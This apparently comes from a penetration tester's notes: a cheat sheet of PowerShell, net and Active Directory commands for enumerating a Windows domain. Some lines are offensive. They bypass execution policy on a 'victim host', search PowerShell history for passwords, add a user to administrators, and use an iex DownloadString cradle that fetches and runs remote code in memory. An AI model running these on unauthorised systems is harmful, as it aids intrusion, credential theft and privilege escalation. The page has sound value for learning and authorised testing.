Powershell

Enumeration

Basic

Command Description

Command	Description
`hostname`	Prints the PC's Name
`[System.Environment]::OSVersion.Version`	Prints out the OS version and revision level
`wmic qfe get Caption,Description,HotFixID,InstalledOn`	Prints the patches and hotfixes applied to the host
`ipconfig /all`	Prints out network adapter state and configurations
`set %USERDOMAIN%`	Displays the domain name to which the host belongs (ran from CMD-prompt)
`set %logonserver%`	Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt)

hostname

Prints the PC's Name

[System.Environment]::OSVersion.Version

Prints out the OS version and revision level

wmic qfe get Caption,Description,HotFixID,InstalledOn

Prints the patches and hotfixes applied to the host

ipconfig /all

Prints out network adapter state and configurations

set %USERDOMAIN%

Displays the domain name to which the host belongs (ran from CMD-prompt)

set %logonserver%

Prints out the name of the Domain controller the host checks in with (ran from CMD-prompt)

Modules

Command Description

Command	Description
`Get-Module`	Lists available modules loaded for use.
`Get-ExecutionPolicy -List`	Will print the execution policy settings for each scope on a host.
`Set-ExecutionPolicy Bypass -Scope Process`	This will change the policy for our current process using the `-Scope` parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.
`Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt`	With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.
`Get-ChildItem Env: \| ft Key,Value`	Return environment values such as key paths, users, computer information, etc.
`powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"`	This is a quick and easy way to download a file from the web using PowerShell and call it from memory.

Get-Module

Lists available modules loaded for use.

Get-ExecutionPolicy -List

Will print the execution policy settings for each scope on a host.

Set-ExecutionPolicy Bypass -Scope Process

This will change the policy for our current process using the -Scope parameter. Doing so will revert the policy once we vacate the process or terminate it. This is ideal because we won't be making a permanent change to the victim host.

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

With this string, we can get the specified user's PowerShell history. This can be quite helpful as the command history may contain passwords or point us towards configuration files or scripts that contain passwords.

Get-ChildItem Env: | ft Key,Value

Return environment values such as key paths, users, computer information, etc.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

This is a quick and easy way to download a file from the web using PowerShell and call it from memory.

NET Commands

Command Description

Command	Description
`net accounts`	Information about password requirements
`net accounts /domain`	Password and lockout policy
`net group /domain`	Information about domain groups
`net group "Domain Admins" /domain`	List users with domain admin privileges
`net group "domain computers" /domain`	List of PCs connected to the domain
`net group "Domain Controllers" /domain`	List PC accounts of domains controllers
`net group <domain_group_name> /domain`	User that belongs to the group
`net groups /domain`	List of domain groups
`net localgroup`	All available groups
`net localgroup administrators /domain`	List users that belong to the administrators group inside the domain (the group `Domain Admins` is included here by default)
`net localgroup Administrators`	Information about a group (admins)
`net localgroup administrators [username] /add`	Add user to administrators
`net share`	Check current shares
`net user <ACCOUNT_NAME> /domain`	Get information about a user within the domain
`net user /domain`	List all users of the domain
`net user %username%`	Information about the current user
`net use x: \computer\share`	Mount the share locally
`net view`	Get a list of computers
`net view /all /domain[:domainname]`	Shares on the domains
`net view \computer /ALL`	List shares of a computer
`net view /domain`	List of PCs of the domain

net accounts

Information about password requirements

net accounts /domain

Password and lockout policy

net group /domain

Information about domain groups

net group "Domain Admins" /domain

List users with domain admin privileges

net group "domain computers" /domain

List of PCs connected to the domain

net group "Domain Controllers" /domain

List PC accounts of domains controllers

net group <domain_group_name> /domain

User that belongs to the group

net groups /domain

List of domain groups

net localgroup

All available groups

net localgroup administrators /domain

List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default)

net localgroup Administrators

Information about a group (admins)

net localgroup administrators [username] /add

Add user to administrators

net share

Check current shares

net user <ACCOUNT_NAME> /domain

Get information about a user within the domain

net user /domain

List all users of the domain

net user %username%

Information about the current user

net use x: \computer\share

Mount the share locally

net view

Get a list of computers

net view /all /domain[:domainname]

Shares on the domains

net view \computer /ALL

List shares of a computer

net view /domain

List of PCs of the domain

Modules

Get-Module

Import-Module ActiveDirectory

Active Directory

Get-ADDomain

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Get-ADTrust -Filter *

Get-ADGroup -Filter * | select name

Detailed group informations :

Get-ADGroup -Identity "Backup Operators"

Group membership :

Get-ADGroupMember -Identity "Backup Operators"

Domain user information :

Get-DomainUser -Identity qu35t -Domain qu35t.pw | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol

Group membership :

Get-DomainGroupMember -Identity "Domain Admins" -Recurse

Trust enumeration :

Get-DomainTrustMapping

Finding users with SPN set :

Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalName

PreviousBloodhound NextKerberosting

Last updated 11 months ago